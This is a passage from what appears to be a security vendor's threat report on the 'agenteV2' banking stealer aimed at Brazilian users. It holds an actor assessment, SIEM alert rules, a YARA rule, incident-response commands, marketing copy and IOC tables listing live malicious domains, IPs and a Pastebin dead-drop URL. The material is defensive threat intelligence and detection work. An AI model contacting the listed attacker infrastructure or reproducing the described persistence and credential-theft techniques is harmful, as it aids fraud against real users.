                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        SMTP ports                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        25, 465, 587 strongly suggests phishing emails dispatched from this same VPS                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-304'>
table#wpdtSimpleTable-304{ table-layout: fixed !important; }
table#wpdtSimpleTable-304 td, table.wpdtSimpleTable304 th { white-space: normal !important; }
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<p>The Hestia Control Panel on port 8083&nbsp;indicates&nbsp;the&nbsp;threat&nbsp;actor self-manages this server rather than using a hosting reseller. The presence of active SMTP ports alongside the C2 port strongly&nbsp;suggests&nbsp;this VPS serves as an all-in-one campaign platform: phishing email dispatch, payload hosting management, and C2 handling.&nbsp;</p>



<h2 class="wp-block-heading">Threat Actor Assessment&nbsp;</h2>



<h3 class="wp-block-heading">Campaign Characteristics&nbsp;</h3>



<ul class="wp-block-list">
<li>Exclusively targeting Brazilian users Portuguese lure, CNJ court number format, Brazilian bank/fintech targeting, and enumeration of LATAM-specific anti-fraud tools (Diebold Warsaw,&nbsp;GbPlugin);&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Judicial summons lure is a well-established social engineering technique in Brazil exploits fear of legal consequences to reduce victim&nbsp;scrutiny;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Per-victim unique tracking ID (?id=3df947b3)&nbsp;demonstrates&nbsp;the actor actively&nbsp;monitors&nbsp;individual infection&nbsp;progress;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>WebSocket persistent backdoor with live screen streaming points to operator-assisted, manual fraud the threat actor watches victims&#8217; screens in real time and waits for banking sessions to&nbsp;open;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Cloudflare Turnstile CAPTCHA on payload server deliberate anti-sandbox and anti-researcher&nbsp;measure;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Multi-step redirect chain before payload delivery adds anti-scraping&nbsp;friction;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>&#8216;agenteV2&#8217; naming implies active development a prior version (v1)&nbsp;likely exists&nbsp;or circulated&nbsp;previously;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Nuitka&nbsp;compilation of the core DLL&nbsp;represents&nbsp;a meaningful step above typical Brazilian stealer tradecraft; however, the failure to strip debug strings, variable names, and cleartext URLs is a significant&nbsp;OpSec&nbsp;failure that partially negates the obfuscation investment.&nbsp;</li>
</ul>



<h3 class="wp-block-heading">Infrastructure Assessment&nbsp;</h3>



<ul class="wp-block-list">
<li>Two-tier delivery infrastructure (69[.]49.241[.]120 for phishing/payload, 38[.]242.246[.]176 for C2) separation reduces single-point takedown&nbsp;impact;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Pastebin dead-drop resolver is the primary C2 resilience mechanism actor can rotate C2 IPs by editing a single Pastebin page without touching deployed&nbsp;malware;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Active SMTP ports on C2 VPS strongly suggest self-hosted phishing email dispatch from the same&nbsp;server;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Hestia Control Panel&nbsp;indicates&nbsp;actor self-manages the VPS not a reseller&nbsp;customer;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Contabo GmbH (AS51167) is a known bulletproof-tolerant provider&nbsp;frequently&nbsp;abused by threat actors for affordable pricing and slow abuse&nbsp;response;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Implementation inconsistency (Registry Run value pointing to .py&nbsp;file) suggests the actor has strong Python development skills but limited operational security maturity.&nbsp;&nbsp;</li>
</ul>



<h2 class="wp-block-heading">Detection &amp; Response Recommendations&nbsp;</h2>



<h3 class="wp-block-heading">1.&nbsp;Immediate Blocking&nbsp;</h3>



<ul class="wp-block-list">
<li>Block domains&nbsp;odaracani[.]online and&nbsp;nuevaprodeciencia[.]club at DNS/proxy/firewall;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Block IPs 69[.]49.241[.]120 and 38[.]242.246[.]176 at&nbsp;perimeter;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Add JA3 hash a48c0d5f95b1ef98f560f324fd275da1 as a network detection rule (IDS/NDR/EDR);&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Block or alert on access to&nbsp;pastebin[.]com/raw/0RmxqY57 and request takedown of the&nbsp;page;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Deploy Suricata SIDs listed in section 6.6.&nbsp;</li>
</ul>



<h3 class="wp-block-heading">2. SIEM Detection Rules&nbsp;</h3>



<ul class="wp-block-list">
<li>Alert: WScript.exe spawning cmd.exe with &#8216;schtasks&#8217; + &#8216;/rl&nbsp;highest&#8217; in command&nbsp;line;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Alert: Any process writing PE files to C:\Program Files (x86)\Wi-fi\;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Alert: Scheduled Task creation with /rl&nbsp;highest by non-SYSTEM processes (Event ID 4698);&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Alert: HKCU\Run key creation by non-installer&nbsp;processes;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Alert:&nbsp;ADODB.Stream&nbsp;+ MSXML2.ServerXMLHTTP instantiated in the same WScript.exe&nbsp;process;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Alert: Outbound TLS connections to port 8443 from non-browser processes.&nbsp;</li>
</ul>



<h3 class="wp-block-heading">3. YARA detection rule&nbsp;</h3>



<p>Use&nbsp;<a href="https://intelligence.any.run/analysis/yara?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktolookup" target="_blank" rel="noreferrer noopener">YARA rule search in TI Lookup</a>:&nbsp;&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="536" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_14-1024x536.png" alt="" class="wp-image-20481" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_14-1024x536.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_14-300x157.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_14-768x402.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_14-370x194.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_14-270x141.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_14-740x388.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_14.png 1510w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">YARA rule in Threat Intelligence Lookup</figcaption></figure>



<p><strong>The rule:</strong>&nbsp;</p>



<pre class="wp-block-code"><code>rule Win_Stealer_AgenteV2_Nuitka { 

meta: 

description = "Core Banker Stealer Nuitka Compiled" 

author = "0xOlympus" 

reference = "Analise de Campanha Judicial" 

date = "2026-03-19" 

severity = "Critical" 


strings: 

// Nuitka Artifcats 

$n1 = "NUITKA_PACKAGE_HOME" ascii 

$n2 = "__nuitka_binary_dir" ascii 

// Strings from report 

$s1 = "agenteV2_historico_detect.dll" ascii wide 

$s2 = "wifi_driver.exe" ascii wide 

$s3 = "reiniciar.exe" ascii wide 

// C2 protocol 

$c2 = "uws://" ascii 

condition: 

uint16(0) == 0x5A4D and (all of ($n*) and 2 of ($s*)) or ($c2) 

}</code></pre>



<h3 class="wp-block-heading">4. Incident Response Checklist&nbsp;</h3>



<p>Verify the presence of active compromise indicators:</p>



<pre class="wp-block-code"><code>schtasks /query /tn "RunAsAdmin_AutoUpdate" 

schtasks /query /tn "RunAsAdmin_Executar" 

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v MonitorSystem dir "C:\Program Files (x86)\Wi-fi\" </code></pre>



<ul class="wp-block-list">
<li>Isolate affected host from network&nbsp;immediately&nbsp;upon&nbsp;detection;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Collect full memory dump of wifi_driver.exe and reiniciar.exe processes before&nbsp;terminating;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Hash all files in C:\Program Files (x86)\Wi-fi\&nbsp;and compare against IOCs in section&nbsp;6.1;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Assume all browser-saved credentials are compromised reset all banking, email, and crypto account&nbsp;passwords;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Review outbound TLS/8443 traffic in network logs for the past 30 days to assess exfiltration&nbsp;window;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Check browser extension integrity stealer may have&nbsp;modified&nbsp;or added extensions.&nbsp;</li>
</ul>



<h3 class="wp-block-heading">5.&nbsp;Threat Intelligence: TI Feeds &amp; TI Lookup&nbsp;</h3>



<p>Proactive intelligence on this campaign and similar threats&nbsp;can be operationalized using ANY.RUN&#8217;s Threat Intelligence suite:&nbsp;</p>



<ul class="wp-block-list">
<li><a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener"><strong>ANY.RUN TI Lookup</strong></a>: Query all IOCs from this report (domains, IPs, file hashes, JA3 fingerprints) directly in TI Lookup to retrieve correlated sandbox verdicts, associated samples, C2 infrastructure mappings, and MITRE ATT&amp;CK tagging across the ANY.RUN corpus. TI Lookup returns structured, analyst-ready context including first-seen/last-seen timestamps, related tasks, and artifact relationships — dramatically accelerating triage.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener"><strong>ANY.RUN TI Feeds</strong></a>: Subscribe to structured IOC feeds to push indicators from this campaign — and the broader Brazilian banking stealer ecosystem — directly into your SIEM, SOAR, EDR, or&nbsp;firewall. Feeds are updated continuously as new samples are analyzed in the sandbox, providing near-real-time coverage of&nbsp;emerging infrastructure and payload variants.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://intelligence.any.run/analysis/yara?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktolookup" target="_blank" rel="noreferrer noopener"><strong>YARA Rules in TI Feeds</strong></a>: The Win_Stealer_AgenteV2_Nuitka YARA rule (section 9.3) can be deployed via ANY.RUN&#8217;s TI infrastructure to automatically flag new samples matching the&nbsp;Nuitka&nbsp;agenteV2 pattern as they surface in the wild.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Proactive Monitoring: Use TI Lookup to&nbsp;monitor&nbsp;the Pastebin dead-drop URL (pastebin.com/raw/0RmxqY57) and C2 IP (38.242.246.176) for updates — if the threat actor rotates infrastructure, ANY.RUN&#8217;s correlated&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener"><strong>sandbox&nbsp;</strong></a>data will surface the new indicators before they reach victim endpoints.&nbsp;</li>
</ul>



<h2 class="wp-block-heading">The Business Case for ANY.RUN Enterprise&nbsp;</h2>



<p>Security decision-makers evaluating their defensive posture against threats like agenteV2 face three compounding problems: the attack surface is broad (any employee in Brazil is a potential victim), the time-to-fraud is measured in minutes (not days), and the attacker&#8217;s tooling actively resists the tools most organizations currently deploy. </p>



<p>The question is not whether a more capable&nbsp;threat&nbsp;intelligence and analysis platform is needed.&nbsp;It&nbsp;is whether the cost of that platform is lower than the cost of a single successful fraud event.&nbsp;</p>



<p>Based on the capabilities&nbsp;demonstrated&nbsp;in this campaign, the answer is unambiguous. A single successful agenteV2 infection gives an attacker live visibility into an employee&#8217;s banking session, the ability to issue commands through a remote shell, and persistence that survives the endpoint until it is explicitly cleaned. The financial exposure from a single operator-assisted fraud event,&nbsp;combined with the credential exfiltration across all browser profiles,&nbsp;will in most cases far exceed the annual cost of enterprise-grade behavioral analysis and threat intelligence.&nbsp;</p>



<p>ANY.RUN Enterprise&nbsp;Suit&nbsp;addresses each failure mode this campaign is designed to exploit:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Before&nbsp;infection</strong>:&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>&nbsp;detonates suspicious email attachments,&nbsp;including password-protected PDFs, with analyst interaction in a fully instrumented Windows environment. The complete 11-stage attack chain surfaces in minutes, before any production endpoint is touched.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>During&nbsp;triage</strong>:&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">TI Lookup</a>&nbsp;delivers instant, correlated intelligence on every IOC in this report&nbsp;(domains, IPs, file hashes, JA3 fingerprints)&nbsp;with MITRE ATT&amp;CK mapping, first/last seen timestamps, and linked sandbox analyses. Triage that takes an analyst hours without context takes seconds with TI Lookup.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>At scale and speed</strong>:&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">TI Feeds</a>&nbsp;push structured, continuously updated IOC streams directly into your SIEM, SOAR, EDR, and&nbsp;firewall,&nbsp;converting sandbox findings into blocking and detection rules automatically, across your entire environment, without analyst intervention per indicator.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Against evasion</strong>: Behavioral analysis in ANY.RUN&#8217;s sandbox is not defeated by&nbsp;Nuitka&nbsp;compilation, in-memory execution, or filename masquerading. It&nbsp;observes&nbsp;what the malware does, not what it looks like,&nbsp;making it structurally resistant to the obfuscation techniques this campaign relies on.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Against infrastructure rotation</strong>: The JA3 TLS fingerprint and behavioral YARA rule in this report remain valid even after the threat actor rotates their C2 IP. ANY.RUN&#8217;s TI infrastructure ensures&nbsp;these durable detection&nbsp;signals are operationalized&nbsp;immediately, not after the next campaign wave.&nbsp;</li>
</ul>



<p>The agenteV2 operators have invested meaningfully in their tooling. The organizations they target deserve to match that investment — with a platform built for the reality of modern, operator-assisted financial fraud rather than the commodity threats of five years ago.&nbsp;</p>



<h2 class="wp-block-heading">Conclusion&nbsp;</h2>



<p>This campaign is a vivid reminder that phishing has outgrown its old role as a simple delivery mechanism. It now acts as a gateway to interactive, real-time financial compromise, where attackers&nbsp;don’t&nbsp;just steal&nbsp;data,&nbsp;they&nbsp;participate&nbsp;in the victim’s actions like an invisible co-pilot with bad intentions.&nbsp;</p>



<p>For businesses, the risk is no longer limited to credential leakage. When malware enables live screen monitoring, remote command execution, and direct interaction with financial sessions, the impact shifts to immediate&nbsp;financial loss, operational disruption, and reputational damage. Finance teams, executives, and any employees handling sensitive transactions become prime targets.&nbsp;</p>



<p>Defending against this class of threats requires more than static detection. Organizations need visibility into behavior, speed in investigation, and context for decision-making.&nbsp;</p>



<p>This is where a combined approach becomes critical:&nbsp;</p>



<ul class="wp-block-list">
<li><a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>&nbsp;analysis&nbsp;helps teams understand exactly how a threat behaves before it spreads.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a>&nbsp;allow proactive blocking of known malicious infrastructure.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">TI Lookup</a>&nbsp;provides instant context, turning isolated indicators into actionable insight.&nbsp;</li>
</ul>



<p>Together, these capabilities transform security from reactive firefighting into controlled, informed response.&nbsp;</p>



<p>In a landscape where attackers&nbsp;operate&nbsp;in real time, businesses must do the same.</p>



<h2 class="wp-block-heading">About ANY.RUN&nbsp;&nbsp;&nbsp;</h2>



<p><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=230426&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and with greater clarity across modern enterprise environments.&nbsp;&nbsp;&nbsp;</p>



<p>It allows teams to safely execute suspicious files and URLs,&nbsp;observe&nbsp;real behavior in an&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>, enrich&nbsp;indicators&nbsp;with immediate context through&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">TI Lookup</a>, and&nbsp;monitor&nbsp;emerging malicious infrastructure using&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a>. Together, these capabilities help reduce investigation uncertainty, accelerate triage, and limit unnecessary escalations across the&nbsp;SOC.&nbsp;&nbsp;&nbsp;</p>



<p>ANY.RUN is trusted by thousands of organizations worldwide and meets enterprise security and compliance expectations. It is&nbsp;<a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II certified</a>,&nbsp;demonstrating&nbsp;its commitment to protecting customer data and&nbsp;maintaining&nbsp;strong security controls.&nbsp;</p>



<h2 class="wp-block-heading">Indicators of Compromise</h2>



<h3 class="wp-block-heading">1. File Hashes</h3>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-305"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="6"
           data-wpID="305"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:11.682242990654%;                    padding:10px;
                    "
                    >
                                        			Algorithm                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:54.672897196262%;                    padding:10px;
                    "
                    >
                                        			Hash                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.644859813084%;                    padding:10px;
                    "
                    >
                                        			File                    </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			MD5                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			285fea57345d838916153c4d8f43ab6c                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			intimacaojudicial.eml			(initial sample)                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			SHA1                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			8a87d63110eeb782bb621b5f3154ca80bdcf5de7                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			intimacaojudicial.eml                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			SHA256                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			5fd682cdfdf2de867be2a4bd378a2c206370c18a598975a11c99dba121e36b1b                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			intimacaojudicial.eml                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        			ssdeep                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        			768:1wxIS5yHtOJ3GsP80Nbt0m0mxGQd5fiCJxXFAwYNBYT:KkHtbo5+mxbnVr                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        			intimacaojudicial.eml                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        			MD5                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        			826d6350724f203b911aa6c8c4626391                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        			agenteV2_historico_detect.dll			(core stealer)                    </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-305'>
table#wpdtSimpleTable-305{ table-layout: fixed !important; }
table#wpdtSimpleTable-305 td, table.wpdtSimpleTable305 th { white-space: normal !important; }
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<h3 class="wp-block-heading"><br>Network IOCs</h3>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-306"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="4"
           data-rows="8"
           data-wpID="306"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:16.920473773266%;                    padding:10px;
                    "
                    >
                                        			Indicator                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:11.505922165821%;                    padding:10px;
                    "
                    >
                                        			Type                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:14.890016920474%;                    padding:10px;
                    "
                    >
                                        			Reputation                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="D1"
                    data-col-index="3"
                    data-row-index="0"
                    style=" width:56.68358714044%;                    padding:10px;
                    "
                    >
                                        			Role                    </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			odaracani.online                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			Domain                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			Malicious                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D2"
                    data-col-index="3"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			Phishing			gate per-victim unique tracker                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			nuevaprodeciencia.club                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			Domain                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			Malicious                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D3"
                    data-col-index="3"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			Payload			distribution + C2 checkin endpoint                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			69.49.241.120                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			IP                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			Malicious                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D4"
                    data-col-index="3"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			Shared			IP for both delivery domains                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        			38.242.246.176                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        			IP                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        			Malicious                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D5"
                    data-col-index="3"
                    data-row-index="4"
